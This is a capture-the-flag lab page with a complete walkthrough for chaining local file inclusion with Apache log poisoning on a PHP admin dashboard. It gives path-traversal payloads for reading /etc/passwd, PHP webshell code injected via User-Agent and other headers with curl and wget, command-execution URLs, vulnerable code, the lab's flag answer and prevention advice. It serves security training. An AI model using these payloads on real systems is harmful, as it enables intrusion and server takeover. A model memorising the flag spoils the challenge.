hackerdna | Hacking Labs /LFI Log Poison

Labs / LFI Log Poison

Daily Challenge
Released 11 Aug 2025

The lab needs to be started first.

Step 1: Click on the green button to Start the Lab

Step 2: Hack the URL or IP of the lab

Step 3: Use your skills and logic to find the flags!

Need help to start?

Daily Challenge

LFI Log Poison - Complete Solution Walkthrough

Understanding the Vulnerability

The SecureCorp Admin Dashboard contains a Local File Inclusion (LFI) vulnerability in its page inclusion mechanism and log viewer functionality. The application fails to properly validate user input when including files, allowing attackers to read arbitrary files from the server and potentially achieve code execution through Apache access log poisoning.

Step 1: Initial Reconnaissance and LFI Discovery

Access the application: Navigate to http://<target-ip> to access the SecureCorp Admin Dashboard
Explore the interface: Navigate through different sections - Dashboard, Users, Reports, Logs, Settings
Analyze URL parameters: Notice the page parameter: ?page=dashboard, ?page=logs, etc.
Test for LFI in page parameter: Try basic LFI payloads

# Test basic LFI
http://<target-ip>?page=../../../etc/passwd
http://<target-ip>?page=../../../etc/hosts
http://<target-ip>?page=../../../proc/version

Verify LFI success: If successful, you should see the contents of system files rendered in the page
Note limitations: The application blocks any paths containing flag.txt, requiring alternative approaches through log poisoning

Step 2: Log Viewer LFI Exploitation

Navigate to the Logs section: Click on 'System Logs' in the sidebar
Analyze the log viewer: Notice the logfile parameter and custom path functionality
Test LFI in log viewer: Use the custom path field to read arbitrary files

# Access via log viewer
http://<target-ip>?page=logs&logfile=../../../etc/passwd
http://<target-ip>?page=logs&custom_path=/etc/passwd

# Read Apache access logs
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log

Examine access.log contents: Look for HTTP requests and User-Agent strings
Understand log structure: Apache logs record User-Agent headers from HTTP requests

Step 3: User-Agent Log Poisoning Setup

User-Agent log poisoning involves injecting malicious PHP code into Apache access logs by sending HTTP requests with PHP code in the User-Agent header.

Prepare PHP payload: Create a PHP code payload for injection

# Basic PHP command execution payload
<?php system($_GET['cmd']); ?>

# Alternative payload for file reading
<?php echo file_get_contents($_GET['file']); ?>

# Multi-purpose payload
<?php if($_GET['cmd']) system($_GET['cmd']); if($_GET['file']) readfile($_GET['file']); ?>

Inject payload via User-Agent: Send HTTP request with PHP code as User-Agent

# cURL injection command
curl http://<target-ip> -H "User-Agent: <?php system($_GET['cmd']); ?>"

# Alternative using wget
wget --user-agent="<?php system($_GET['cmd']); ?>" http://<target-ip>

# Using Burp Suite or manual request
GET / HTTP/1.1
Host: http://<target-ip>
User-Agent: <?php system($_GET['cmd']); ?>

Step 4: Executing the Log Poisoning Attack

Perform User-Agent injection: Execute the HTTP request with PHP payload as User-Agent

# Execute the injection
curl http://<target-ip> -H "User-Agent: <?php system($_GET['cmd']); ?>"

# The request will be logged in /var/log/apache2/access.log
# with the PHP code in the User-Agent field

Verify log poisoning: Check if the PHP code appears in access.log

# Check access.log via LFI
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log

Execute commands: Use the poisoned log file to execute system commands

# Command execution via poisoned log
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=whoami
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=id
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=ls -la /
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=cat /opt/backups/legacy/archive/2023/q4/dec/temp/.hidden/flag.txt

Step 5: Retrieving the Flag

Execute flag retrieval command: Use the poisoned log to read the flag file

# First, search for the flag file location (deep enumeration required)
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=find / -name "*flag.txt*" 2>/dev/null
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=find / -name "flag.txt" 2>/dev/null
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=ls -la /opt/
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=find /opt -type f -name "*.txt" 2>/dev/null

# Navigate through the deep directory structure
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=ls -la /opt/backups/
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=ls -la /opt/backups/legacy/
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=ls -la /opt/backups/legacy/archive/
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=ls -la /opt/backups/legacy/archive/2023/q4/dec/temp/
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=ls -la /opt/backups/legacy/archive/2023/q4/dec/temp/.hidden/

# Finally retrieve the flag
http://<target-ip>?page=logs&logfile=/var/log/apache2/access.log&cmd=cat /opt/backups/legacy/archive/2023/q4/dec/temp/.hidden/flag.txt

Flag Location: /opt/backups/legacy/archive/2023/q4/dec/temp/.hidden/flag.txt
Flag: bad50c39-7eb0-4904-81c1-852466ed925c

Alternative Attack Methods

Method 1: Direct Page Parameter LFI

# Direct file inclusion via page parameter
http://<target-ip>?page=/var/log/apache2/access.log&cmd=cat /opt/backups/legacy/archive/2023/q4/dec/temp/.hidden/flag.txt
http://<target-ip>?page=../../../var/log/apache2/access.log&cmd=whoami

Method 2: PHP Filter Wrappers

# Using PHP filters for file reading
http://<target-ip>?page=php://filter/read=convert.base64-encode/resource=/etc/passwd
http://<target-ip>?page=php://filter/resource=/var/log/apache2/access.log

Method 3: Alternative Header Poisoning

# Poison via other headers (if logged)
curl http://<target-ip> -H "Referer: <?php system($_GET['cmd']); ?>"
curl http://<target-ip> -H "X-Forwarded-For: <?php system($_GET['cmd']); ?>"

# Check error logs if access fails
http://<target-ip>?page=logs&logfile=/var/log/apache2/error.log

Understanding the Vulnerability Code

The vulnerable code in index.php:

function loadPage($page) {
    // VULNERABLE: Only basic sanitization
    $page = str_replace(['http://', 'https://', 'ftp://'], '', $page);
    
    $pagePath = "pages/" . $page . ".php";
    if (file_exists($pagePath)) {
        return $pagePath;
    }
    
    // VULNERABLE: Direct file inclusion without validation
    if (file_exists($page)) {
        return $page;
    }
}

// Direct inclusion without sanitization
include($currentPage);

The log viewer vulnerability in logs.php:

// VULNERABLE: Direct file access without validation
if (file_exists($logFile)) {
    $logContent = file_get_contents($logFile);
    // Content is directly displayed - allows code execution if poisoned
}

Prevention Strategies

Input validation: Implement strict whitelist validation for file inclusion parameters
Path traversal protection: Use realpath() and basename() to prevent directory traversal
File access restrictions: Limit file access to specific directories using open_basedir
Log protection: Store logs outside web root and use proper access controls
Header sanitization: Sanitize or filter User-Agent and other headers before logging
Content Security Policy: Implement CSP headers to prevent code execution

Real-World Impact of LFI and Log Poisoning

Sensitive data exposure: Access to configuration files, database credentials, source code
Remote code execution: Through log poisoning, session files, or uploaded content
System compromise: Potential privilege escalation and complete server takeover
Data exfiltration: Access to user data, business information, and system details
Lateral movement: Using compromised systems to attack internal network resources
Compliance violations: Unauthorized access to regulated data and systems

Technical Analysis of This Challenge

Vulnerability type: Local File Inclusion (LFI) with User-Agent log poisoning for RCE
Root cause: Insufficient input validation in file inclusion mechanisms
Attack vector: Page parameter and log viewer functionality exploitation
Escalation method: Apache access log poisoning with PHP code injection via User-Agent
Impact level: Remote code execution and complete system compromise
Educational value: Demonstrates advanced web application attack chaining techniques

Challenge Summary

This LFI Log Poison challenge demonstrates one of the most sophisticated attack vectors in web application security: combining Local File Inclusion vulnerabilities with User-Agent log poisoning techniques to achieve remote code execution. By exploiting the application's file handling mechanisms and Apache access logging, attackers can escalate from simple file disclosure to complete system compromise. This challenge showcases the importance of implementing comprehensive input validation and understanding how web server logging can become an attack vector.